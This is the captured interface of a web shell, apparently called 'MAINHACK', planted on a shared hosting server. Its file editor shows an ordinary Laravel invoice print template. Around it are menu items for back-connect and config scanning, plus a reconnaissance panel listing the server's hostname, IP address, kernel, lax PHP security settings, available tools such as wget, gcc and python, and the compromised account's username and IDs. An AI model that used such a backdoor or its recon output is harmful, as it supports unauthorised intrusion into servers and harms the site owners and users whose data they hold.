[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: print.blade.php
<!doctype html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>{{ trans('admin/main.print') }} {{ $document->title }}</title> <link rel="stylesheet" href="/assets/admin/vendor/bootstrap/bootstrap.min.css"/> <link rel="stylesheet" href="/assets/admin/css/print.css"> </head> <body> <div class="main-box"> <div class="print-1"></div> <div class="factor-logo-container"> <img src="{{ getGeneralSettings('logo') }}" class=""/> <br> <h3 class="mt-1">{{ trans('financial.financial_documents') }}</h3> </div> <div class="print-2"> <div> <span>{{ trans('admin/main.document_number') }}:</span> <label>{{ $document->id }}</label> </div> <div class="mt-2"> <span>{{ trans('admin/main.created_at') }}:</span> <label>{{ dateTimeFormat($document->created_at,'d F Y - H:i') }}</label> </div> </div> <div class="w-100 clear-both"></div> <table> <th>{{ trans('admin/main.email') }}</th> <th>{{ trans('admin/main.mobile') }}</th> <th>{{ trans('admin/main.title') }}</th> <th>{{ trans('admin/main.type') }}</th> <th>{{ trans('admin/main.amount') }}({{ $currency }})</th> <tr> <th>{{ $document->user->email ?? '-' }}</th> <th>{{ $document->user->mobile ?? '-' }}</th> <th> @if(!empty($document->webinar_id)) <span class="d-block font-weight-bold">{{ trans('admin/main.item_purchased') }}</span> <span class="d-block font-weight-bold">#{{ $document->webinar_id }}-{{ $document->webinar->title }}</span> @elseif(!empty($document->meeting_time_id)) <span class="d-block font-weight-bold">{{ trans('admin/main.item_purchased') }}</span> <span class="d-block font-weight-bold">{{ trans('admin/main.meeting') }}</span> @elseif(!empty($document->subscribe_id)) <span class="d-block font-weight-bold">{{ trans('admin/main.purchased_subscribe') }}</span> @elseif(!empty($document->promotion_id)) <span class="d-block font-weight-bold">{{ trans('admin/main.purchased_promotion') }}</span> @endif </th> <th> @switch($document->type) @case(\App\Models\Accounting::$addiction) <span class="text-success">{{ trans('admin/main.addiction') }}</span> @break @case(\App\Models\Accounting::$deduction) <span class="text-danger">{{ trans('admin/main.deduction') }}</span> @break @endswitch </th> <th>{{ $document->amount }}</th> </tr> </table> <table> <tr> <th class="th-1"> {{ !empty($document->description) ? $document->description : 'Description' }} </th> </tr> </table> <div class="print-3"></div> <div class="print-4"> <div class="print-5"> <span>{{ trans('public.created_by') }}:</span> <label>{{ !empty($document->creator_id) ? $document->creator->full_name : 'Automatic' }}</label> </div> </div> <div class="print-6"></div> </div> </body> </html>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285